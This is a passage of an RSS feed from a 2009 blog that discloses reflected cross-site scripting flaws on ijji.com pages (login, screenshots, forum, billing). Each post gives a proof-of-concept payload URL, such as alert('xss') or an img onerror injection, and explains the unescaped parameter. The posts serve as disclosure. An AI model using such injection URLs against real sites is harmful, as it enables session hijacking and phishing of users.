		<link>http://ijjixss.wordpress.com/2009/08/11/login-next-url/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/11/login-next-url/#comments</comments>
		<pubDate>Tue, 11 Aug 2009 16:31:54 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[patched]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=126</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);// There is no criteria, as you can be logged in or not &#8211; though if you are, you will be logged out (naturally). In a nutshell, double quotes are encoded, but single ones are not &#8211; and also, the nextURL parameter is carelessly outputted straight into a script tag (for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=126&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p style="text-align:center;"><em>http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//</em></p>
<p>There is no criteria, as you can be logged in or not &#8211; though if you are, you will be logged out (naturally).</p>
<p>In a nutshell, double quotes are encoded, but single ones are not &#8211; and also, the <em>nextURL</em> parameter is carelessly outputted straight into a script tag (for the <em>loginENMLoginForm</em> function).</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/126/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=126&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/11/login-next-url/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Game Screenshot</title>
		<link>http://ijjixss.wordpress.com/2009/08/10/game-screenshot/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/10/game-screenshot/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 16:07:03 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[non-persistent]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=123</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None http://game.ijji.com/sshot.nhn?gameId=u_gunz&#38;index=0);alert(/xss/.source Fairly old method, updated without the need for single or double quotes for the &#8220;xss&#8221; string (which are now correctly encoded before output). The variable index still doesn&#8217;t strip anything which doesn&#8217;t resemble an integer.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=123&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p style="text-align:center;"><em>http://game.ijji.com/sshot.nhn?gameId=u_gunz&amp;index=0);alert(/xss/.source</em></p>
<p>Fairly old method, updated without the need for single or double quotes for the &#8220;xss&#8221; string (which are now correctly encoded before output). The variable <em>index</em> still doesn&#8217;t strip anything which doesn&#8217;t resemble an integer.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/123/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/123/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/123/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=123&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/10/game-screenshot/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>Blog Status</title>
		<link>http://ijjixss.wordpress.com/2009/08/10/blog-status/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/10/blog-status/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 15:42:20 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=121</guid>
		<description><![CDATA[I started this blog as an experiment, and as a small sideline challenge (to discover a vulnerability on the IJJI site every day for a month), but as I look back, I seem to have made numerous errors. Each post should be focusing on a different script. My early posts focused on polls, which all [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=121&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I started this blog as an experiment, and as a small sideline challenge (to discover a vulnerability on the IJJI site every day for a month), but as I look back, I seem to have made numerous errors.</p>
<p>Each post should be focusing on a different script. My early posts focused on polls, which all used the same script:</p>
<p style="text-align:center;"><em>http://event.ijji.com/poll.nhn</em></p>
<p>The only difference in each disclosure was the poll name, which did return different data, but shouldn&#8217;t have been posted seperately, as it wasn&#8217;t a new script.</p>
<p>Scripts on different subdomains <strong>are</strong> allowed though, as subdomains are seen a different hostnames according to the <a href="http://en.wikipedia.org/wiki/Same_origin_policy" target="_blank">same origin policy</a> (which is important for an attack).</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/121/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/121/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/121/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=121&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/10/blog-status/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>BBS Forum View</title>
		<link>http://ijjixss.wordpress.com/2009/08/09/bbs-forum-view/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/09/bbs-forum-view/#comments</comments>
		<pubDate>Sun, 09 Aug 2009 01:07:03 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[patched]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=118</guid>
		<description><![CDATA[Type: Non-persistent Criteria: None http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&#38;page=&#38;id=999999999&#38;ordering=%22;alert(%27xss%27);// Note that the exploit will execute twice. Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the variable id is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn&#8217;t yet exist (less [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=118&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>None</strong></p>
<p style="text-align:center;"><code>http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&amp;page=&amp;id=999999999&amp;ordering=%22;alert(%27xss%27);//</code></p>
<p><em>Note that the exploit will execute twice.</em></p>
<p>Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the variable <em>id</em> is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn&#8217;t yet exist (less data is returned when it doesn&#8217;t exist, but this exploit will still work or without a valid <em>id</em> variable).</p>
<p>The XSS relies on the value of <em>ordering</em>, which is blindingly printed into the main page, and in both instances, directly into a SCRIPT tag (the phrase &#8220;script&#8221; has been blacklisted from all scripts, which is why I&#8217;ve been using an alternative).</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/118/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=118&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/09/bbs-forum-view/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
		<item>
		<title>HTTPS Add G Coin</title>
		<link>http://ijjixss.wordpress.com/2009/08/08/https-add-g-coin/</link>
		<comments>http://ijjixss.wordpress.com/2009/08/08/https-add-g-coin/#comments</comments>
		<pubDate>Sat, 08 Aug 2009 12:11:08 +0000</pubDate>
		<dc:creator>x1nixmzeng</dc:creator>
				<category><![CDATA[non-persistent]]></category>
		<category><![CDATA[x1nixmzeng]]></category>

		<guid isPermaLink="false">http://ijjixss.wordpress.com/?p=115</guid>
		<description><![CDATA[Type: Non-persistent Criteria: Requires login https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22 Another vulnerability from the paymentprocess.nhn script. The RURL (referral URL) variable doesn&#8217;t check if the address supplied is valid or care to strip any characters. A particularly lazy example. Outputted to a hidden input tag (REQ_RURL), there are no visible changes to the end-user.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=115&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Type: <strong>Non-persistent</strong><br />
Criteria: <strong>Requires login</strong></p>
<p style="text-align:center;"><code>https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22</code></p>
<p><a href="http://ijjixss.wordpress.com/2009/07/31/https-billing/" target="_blank">Another vulnerability</a> from the <em>paymentprocess.nhn</em> script. The <em>RURL</em> (referral URL) variable doesn&#8217;t check if the address supplied is valid or care to strip any characters. A particularly lazy example.</p>
<p>Outputted to a hidden input tag (<em>REQ_RURL</em>), there are no visible changes to the end-user.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ijjixss.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ijjixss.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ijjixss.wordpress.com/115/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ijjixss.wordpress.com&amp;blog=8601780&amp;post=115&amp;subd=ijjixss&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ijjixss.wordpress.com/2009/08/08/https-add-g-coin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ed1d3298b0cd91830204ac615c2a8bf?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">x1nixmzeng</media:title>
		</media:content>
	</item>
	</channel>
</rss>
